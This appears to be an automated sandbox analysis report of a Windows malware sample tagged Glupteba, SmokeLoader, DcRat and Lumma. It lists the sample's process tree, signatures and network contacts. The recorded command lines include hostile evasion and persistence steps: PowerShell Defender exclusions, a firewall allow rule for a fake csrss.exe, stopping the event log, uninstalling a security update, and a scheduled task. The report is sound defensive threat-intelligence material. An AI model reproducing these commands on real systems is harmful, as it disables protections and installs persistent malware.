Malware Analysis Report

2024-11-13 14:08

Sample ID 240227-b5vp5sde24
Target 5cddaacf9782c030db128e3ebfd8f301.exe
SHA256 6d533c8a98cee42c8f797a0b982a0be0da8d7503da8c42e8da10a88bfee9bf23
Tags
glupteba smokeloader pub1 backdoor bootkit dropper evasion loader persistence trojan upx dcrat lumma discovery infostealer rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6d533c8a98cee42c8f797a0b982a0be0da8d7503da8c42e8da10a88bfee9bf23

Threat Level: Known bad

The file 5cddaacf9782c030db128e3ebfd8f301.exe was found to be: Known bad.

Malicious Activity Summary


DcRat

SmokeLoader

Glupteba payload

Lumma Stealer

Glupteba

Creates new service(s)

Downloads MZ/PE file

Stops running service(s)

Modifies Windows Firewall

Deletes itself

Reads data files stored by FTP clients

Executes dropped EXE

Checks computer location settings

Reads user/profile data of web browsers

UPX packed file

Loads dropped DLL

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Writes to the Master Boot Record (MBR)

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious use of SetWindowsHookEx

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-27 01:44

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-02-27 01:44

Reported

2024-02-27 01:46

Platform

win7-20240221-en

Max time kernel

59s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Creates new service(s)

persistence

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\CSRSS = "\"C:\\ProgramData\\Drivers\\csrss.exe\"" | C:\Users\Admin\AppData\Local\Temp\E024.exe | N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description | Indicator | Process | Target
File opened for modification | \??\PHYSICALDRIVE0 | C:\Users\Admin\AppData\Local\Temp\E42B.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1996 set thread context of 980 | N/A | C:\Users\Admin\AppData\Local\Temp\E024.exe | C:\Users\Admin\AppData\Local\Temp\E024.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe | N/A
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe | N/A
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe | N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FLFHF.tmp\590.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1256 wrote to memory of 2668 N/A N/A C:\Users\Admin\AppData\Local\Temp\CF50.exe
PID 1256 wrote to memory of 2668 N/A N/A C:\Users\Admin\AppData\Local\Temp\CF50.exe
PID 1256 wrote to memory of 2668 N/A N/A C:\Users\Admin\AppData\Local\Temp\CF50.exe
PID 1256 wrote to memory of 2668 N/A N/A C:\Users\Admin\AppData\Local\Temp\CF50.exe
PID 2668 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\CF50.exe C:\Windows\SysWOW64\WerFault.exe
PID 2668 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\CF50.exe C:\Windows\SysWOW64\WerFault.exe
PID 2668 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\CF50.exe C:\Windows\SysWOW64\WerFault.exe
PID 2668 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Local\Temp\CF50.exe C:\Windows\SysWOW64\WerFault.exe
PID 1256 wrote to memory of 2416 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1256 wrote to memory of 2416 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1256 wrote to memory of 2416 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1256 wrote to memory of 2416 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1256 wrote to memory of 2416 N/A N/A C:\Windows\system32\regsvr32.exe
PID 2416 wrote to memory of 2456 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2456 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2456 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2456 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2456 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2456 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2416 wrote to memory of 2456 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1256 wrote to memory of 1996 N/A N/A C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1256 wrote to memory of 1996 N/A N/A C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1256 wrote to memory of 1996 N/A N/A C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1256 wrote to memory of 1996 N/A N/A C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1996 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\E024.exe C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1996 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\E024.exe C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1996 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\E024.exe C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1996 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\E024.exe C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1996 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\E024.exe C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1996 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\E024.exe C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1996 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\E024.exe C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1996 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\E024.exe C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1256 wrote to memory of 620 N/A N/A C:\Users\Admin\AppData\Local\Temp\E42B.exe
PID 1256 wrote to memory of 620 N/A N/A C:\Users\Admin\AppData\Local\Temp\E42B.exe
PID 1256 wrote to memory of 620 N/A N/A C:\Users\Admin\AppData\Local\Temp\E42B.exe
PID 1256 wrote to memory of 620 N/A N/A C:\Users\Admin\AppData\Local\Temp\E42B.exe
PID 1996 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\E024.exe C:\Users\Admin\AppData\Local\Temp\E024.exe
PID 1256 wrote to memory of 1788 N/A N/A C:\Users\Admin\AppData\Local\Temp\590.exe
PID 1256 wrote to memory of 1788 N/A N/A C:\Users\Admin\AppData\Local\Temp\590.exe
PID 1256 wrote to memory of 1788 N/A N/A C:\Users\Admin\AppData\Local\Temp\590.exe
PID 1256 wrote to memory of 1788 N/A N/A C:\Users\Admin\AppData\Local\Temp\590.exe
PID 1256 wrote to memory of 1788 N/A N/A C:\Users\Admin\AppData\Local\Temp\590.exe
PID 1256 wrote to memory of 1788 N/A N/A C:\Users\Admin\AppData\Local\Temp\590.exe
PID 1256 wrote to memory of 1788 N/A N/A C:\Users\Admin\AppData\Local\Temp\590.exe
PID 1788 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\590.exe C:\Users\Admin\AppData\Local\Temp\is-FLFHF.tmp\590.tmp
PID 1788 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\590.exe C:\Users\Admin\AppData\Local\Temp\is-FLFHF.tmp\590.tmp
PID 1788 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\590.exe C:\Users\Admin\AppData\Local\Temp\is-FLFHF.tmp\590.tmp
PID 1788 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\590.exe C:\Users\Admin\AppData\Local\Temp\is-FLFHF.tmp\590.tmp
PID 1788 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\590.exe C:\Users\Admin\AppData\Local\Temp\is-FLFHF.tmp\590.tmp
PID 1788 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\590.exe C:\Users\Admin\AppData\Local\Temp\is-FLFHF.tmp\590.tmp
PID 1788 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\590.exe C:\Users\Admin\AppData\Local\Temp\is-FLFHF.tmp\590.tmp
PID 1256 wrote to memory of 2364 N/A N/A C:\Users\Admin\AppData\Local\Temp\3307.exe
PID 1256 wrote to memory of 2364 N/A N/A C:\Users\Admin\AppData\Local\Temp\3307.exe
PID 1256 wrote to memory of 2364 N/A N/A C:\Users\Admin\AppData\Local\Temp\3307.exe
PID 1256 wrote to memory of 2364 N/A N/A C:\Users\Admin\AppData\Local\Temp\3307.exe
PID 2364 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\3307.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 2364 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\3307.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 2364 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\3307.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 2364 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\3307.exe C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
PID 2364 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\3307.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 2364 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\3307.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 2364 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\3307.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 2364 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\3307.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
PID 2364 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\3307.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe

"C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe"

C:\Users\Admin\AppData\Local\Temp\CF50.exe

C:\Users\Admin\AppData\Local\Temp\CF50.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 124

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\D911.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\D911.dll

C:\Users\Admin\AppData\Local\Temp\E024.exe

C:\Users\Admin\AppData\Local\Temp\E024.exe

C:\Users\Admin\AppData\Local\Temp\E024.exe

C:\Users\Admin\AppData\Local\Temp\E024.exe

C:\Users\Admin\AppData\Local\Temp\E42B.exe

C:\Users\Admin\AppData\Local\Temp\E42B.exe

C:\Users\Admin\AppData\Local\Temp\590.exe

C:\Users\Admin\AppData\Local\Temp\590.exe

C:\Users\Admin\AppData\Local\Temp\is-FLFHF.tmp\590.tmp

"C:\Users\Admin\AppData\Local\Temp\is-FLFHF.tmp\590.tmp" /SL5="$201F6,2424585,54272,C:\Users\Admin\AppData\Local\Temp\590.exe"

C:\Users\Admin\AppData\Local\Temp\3307.exe

C:\Users\Admin\AppData\Local\Temp\3307.exe

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

"C:\Users\Admin\AppData\Local\Temp\FourthX.exe"

C:\Users\Admin\AppData\Local\Temp\4705.exe

C:\Users\Admin\AppData\Local\Temp\4705.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

C:\Users\Admin\AppData\Local\Temp\nsz66C1.tmp

C:\Users\Admin\AppData\Local\Temp\nsz66C1.tmp

C:\Users\Admin\AppData\Local\Temp\7DBF.exe

C:\Users\Admin\AppData\Local\Temp\7DBF.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2520 -s 124

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240227014540.log C:\Windows\Logs\CBS\CbsPersist_20240227014540.cab

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "UTIXDCVF"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "UTIXDCVF"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\explorer.exe

explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 selebration17io.io udp
RU 91.215.85.120:80 selebration17io.io tcp
US 8.8.8.8:53 joly.bestsup.su udp
US 172.67.171.112:80 joly.bestsup.su tcp
DE 185.172.128.19:80 185.172.128.19 tcp
FR 91.121.181.6:9001 tcp
DE 167.86.94.107:9001 tcp
US 8.8.8.8:53 trmpc.com udp
ES 188.26.207.181:19001 tcp
PA 200.46.202.73:80 trmpc.com tcp
DE 185.172.128.90:80 185.172.128.90 tcp
DE 185.172.128.127:80 185.172.128.127 tcp
N/A 127.0.0.1:49312 tcp
AT 109.70.100.29:443 tcp
US 154.35.175.225:443 tcp
NL 195.189.96.148:443 tcp
DE 185.172.128.145:80 185.172.128.145 tcp
CA 199.58.81.140:443 tcp
FR 87.98.242.239:443 tcp
CZ 87.236.195.216:80 tcp
CZ 87.236.195.216:80 tcp
FR 87.98.242.239:443 tcp
US 8.8.8.8:53 kamsmad.com udp
CO 186.147.159.149:80 kamsmad.com tcp
CO 186.147.159.149:80 kamsmad.com tcp
CO 186.147.159.149:80 kamsmad.com tcp
US 8.8.8.8:53 forum.one-teams.com udp
US 8.8.8.8:53 forum.one-teams.com udp
US 8.8.8.8:53 tansiq.mod.gov.eg udp
US 8.8.8.8:53 tansiq.mod.gov.eg udp
US 8.8.8.8:53 voterportal.eci.gov.in udp
US 8.8.8.8:53 playone1.com udp
US 8.8.8.8:53 myp508.com udp
US 8.8.8.8:53 m.forzza.com udp
US 8.8.8.8:53 my.wizardingworld.com udp
US 8.8.8.8:53 voterportal.eci.gov.in udp
US 8.8.8.8:53 voterportal.eci.gov.in udp
US 8.8.8.8:53 playone1.com udp
US 8.8.8.8:53 voterportal.eci.gov.in udp
US 8.8.8.8:53 myp508.com udp
US 8.8.8.8:53 m.forzza.com udp
US 8.8.8.8:53 myp508.com udp
CO 186.147.159.149:80 kamsmad.com tcp
US 8.8.8.8:53 mestermc.hu udp
US 8.8.8.8:53 my.wizardingworld.com udp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
US 8.8.8.8:53 mestermc.hu udp
US 8.8.8.8:53 passport.twitch.tv udp
US 103.224.212.215:21 myp508.com tcp
US 8.8.8.8:53 coincommunity.com udp
HU 94.125.176.47:21 mestermc.hu tcp
NL 37.48.65.152:22 forum.one-teams.com tcp
US 104.18.13.241:443 m.forzza.com tcp
GB 18.245.218.127:21 my.wizardingworld.com tcp
GB 18.245.218.127:443 my.wizardingworld.com tcp
US 8.8.8.8:53 paidtask.in udp
US 8.8.8.8:53 passport.twitch.tv udp
US 8.8.8.8:53 park-mx.above.com udp
US 8.8.8.8:53 coincommunity.com udp
US 8.8.8.8:53 passport.twitch.tv udp
US 8.8.8.8:53 passport.twitch.tv udp
US 8.8.8.8:53 passport.twitch.tv udp
US 8.8.8.8:53 passport.twitch.tv udp
EG 62.117.41.16:995 tansiq.mod.gov.eg tcp
US 8.8.8.8:53 paidtask.in udp
GB 18.245.218.127:143 my.wizardingworld.com tcp
US 8.8.8.8:53 mx3.zoho.eu udp
US 8.8.8.8:53 mx3.zoho.eu udp
US 8.8.8.8:53 account.protonvpn.com udp
US 8.8.8.8:53 servsafe.com udp
HU 94.125.176.47:443 mestermc.hu tcp
US 50.28.72.26:22 coincommunity.com tcp
US 8.8.8.8:53 servsafe.com udp
US 8.8.8.8:53 servsafe.com udp
US 104.18.13.241:995 m.forzza.com tcp
US 104.18.13.241:143 m.forzza.com tcp
US 104.18.13.241:465 m.forzza.com tcp
GB 18.245.218.127:995 my.wizardingworld.com tcp
US 199.59.243.225:465 playone1.com tcp
IN 117.239.179.130:143 voterportal.eci.gov.in tcp
US 50.28.72.26:21 coincommunity.com tcp
US 199.59.243.225:143 playone1.com tcp
US 103.224.212.215:80 myp508.com tcp
US 104.18.13.241:80 m.forzza.com tcp
US 103.224.212.34:143 park-mx.above.com tcp
GB 18.245.218.127:80 my.wizardingworld.com tcp
US 103.224.212.34:465 park-mx.above.com tcp
NL 37.48.65.152:21 forum.one-teams.com tcp
US 199.59.243.225:80 playone1.com tcp
US 8.8.8.8:53 account.protonvpn.com udp
US 8.8.8.8:53 mx2.emailsrvr.com udp
GB 18.245.218.127:465 my.wizardingworld.com tcp
US 8.8.8.8:53 portal.essor.com.br udp
GB 18.245.187.125:22 passport.twitch.tv tcp
US 103.224.212.34:995 park-mx.above.com tcp
IN 117.239.179.130:465 voterportal.eci.gov.in tcp
US 50.28.72.26:443 coincommunity.com tcp
GB 18.245.218.93:21 my.wizardingworld.com tcp
GB 18.245.187.83:21 passport.twitch.tv tcp
HU 94.125.176.47:80 mestermc.hu tcp
US 199.59.243.225:995 playone1.com tcp
GB 18.245.187.7:443 passport.twitch.tv tcp
GB 18.245.187.83:143 passport.twitch.tv tcp
DE 185.159.159.143:22 account.protonvpn.com tcp
IN 117.239.179.130:995 voterportal.eci.gov.in tcp
US 104.18.13.241:80 m.forzza.com tcp
NL 185.230.212.166:143 mx3.zoho.eu tcp
GB 18.245.187.7:80 passport.twitch.tv tcp
US 8.8.8.8:53 aluno.seduc.ce.gov.br udp
NL 185.230.212.166:465 mx3.zoho.eu tcp
US 68.142.70.44:22 servsafe.com tcp
GB 18.245.218.93:143 my.wizardingworld.com tcp
US 68.142.70.44:21 servsafe.com tcp
IN 117.239.179.130:80 voterportal.eci.gov.in tcp
GB 18.245.187.7:465 passport.twitch.tv tcp
NL 185.230.212.166:995 mx3.zoho.eu tcp
US 104.18.12.241:143 m.forzza.com tcp
GB 18.245.187.7:995 passport.twitch.tv tcp
US 173.203.187.2:143 mx2.emailsrvr.com tcp
DE 185.159.159.143:21 account.protonvpn.com tcp
HU 94.125.176.47:21 mestermc.hu tcp
DE 185.159.159.143:443 account.protonvpn.com tcp
GB 18.245.218.127:80 my.wizardingworld.com tcp
GB 18.245.218.80:21 my.wizardingworld.com tcp
US 104.18.12.241:465 m.forzza.com tcp
GB 18.245.187.7:22 passport.twitch.tv tcp
GB 18.245.218.93:465 my.wizardingworld.com tcp
US 8.8.8.8:53 portal.essor.com.br udp
US 8.8.8.8:53 auth.riotgames.com udp
US 8.8.8.8:53 aluno.seduc.ce.gov.br udp
US 8.8.8.8:53 ww25.myp508.com udp
US 8.8.8.8:53 portal.essor.com.br udp
US 104.18.12.241:995 m.forzza.com tcp
GB 18.245.218.93:995 my.wizardingworld.com tcp
GB 18.245.218.80:143 my.wizardingworld.com tcp
US 8.8.8.8:53 auth.riotgames.com udp
GB 18.245.187.75:21 passport.twitch.tv tcp
US 8.8.8.8:53 mx.servsafe.com udp
GB 18.245.187.75:143 passport.twitch.tv tcp
US 173.203.187.2:465 mx2.emailsrvr.com tcp
US 104.18.13.241:443 m.forzza.com tcp
DE 185.159.159.143:143 account.protonvpn.com tcp
GB 18.245.187.75:995 passport.twitch.tv tcp
US 8.8.8.8:53 s.activision.com udp
US 8.8.8.8:53 signup.tr.leagueoflegends.com udp
US 8.8.8.8:53 signup.tr.leagueoflegends.com udp
CO 186.147.159.149:80 kamsmad.com tcp
GB 18.245.187.75:465 passport.twitch.tv tcp
US 50.28.72.26:80 coincommunity.com tcp
US 68.142.70.44:443 servsafe.com tcp
US 173.203.187.2:995 mx2.emailsrvr.com tcp
NL 37.48.65.152:22 forum.one-teams.com tcp
US 199.59.243.225:80 ww25.myp508.com tcp
US 103.224.212.215:80 myp508.com tcp
US 45.60.64.42:22 portal.essor.com.br tcp
HU 94.125.176.47:80 mestermc.hu tcp
BR 177.71.235.216:22 aluno.seduc.ce.gov.br tcp
US 104.16.120.50:22 auth.riotgames.com tcp
US 103.224.212.34:143 park-mx.above.com tcp
BR 177.71.235.216:21 aluno.seduc.ce.gov.br tcp
DE 185.159.159.143:465 account.protonvpn.com tcp
DE 185.159.159.143:80 account.protonvpn.com tcp
US 38.98.152.194:465 mx.servsafe.com tcp
US 103.224.212.34:465 park-mx.above.com tcp
BR 177.71.235.216:443 aluno.seduc.ce.gov.br tcp
GB 18.245.187.7:443 passport.twitch.tv tcp
US 45.60.64.42:21 portal.essor.com.br tcp
US 45.60.64.42:443 portal.essor.com.br tcp
GB 18.245.187.7:80 passport.twitch.tv tcp
US 50.28.72.26:80 coincommunity.com tcp
GB 18.245.218.127:443 my.wizardingworld.com tcp
NL 37.48.65.152:21 forum.one-teams.com tcp
DE 185.159.159.143:80 account.protonvpn.com tcp
DE 185.159.159.143:995 account.protonvpn.com tcp
US 45.60.64.42:143 portal.essor.com.br tcp
US 8.8.8.8:53 bbolen2.solcreative.ca udp
EG 62.117.41.16:22 tansiq.mod.gov.eg tcp
US 38.98.152.194:143 mx.servsafe.com tcp
HU 94.125.176.47:443 mestermc.hu tcp
US 104.16.120.50:21 auth.riotgames.com tcp
US 50.28.72.26:80 coincommunity.com tcp
GB 18.135.83.51:22 signup.tr.leagueoflegends.com tcp
US 103.224.212.34:995 park-mx.above.com tcp
US 104.16.119.50:22 auth.riotgames.com tcp
US 8.8.8.8:53 s.activision.com udp
US 8.8.8.8:53 bbolen2.solcreative.ca udp
US 8.8.8.8:53 e.batelco.com udp
US 103.224.212.215:21 myp508.com tcp
US 104.18.13.241:143 m.forzza.com tcp
US 68.142.70.44:80 servsafe.com tcp
US 38.98.152.194:995 mx.servsafe.com tcp
HU 94.125.176.47:990 mestermc.hu tcp
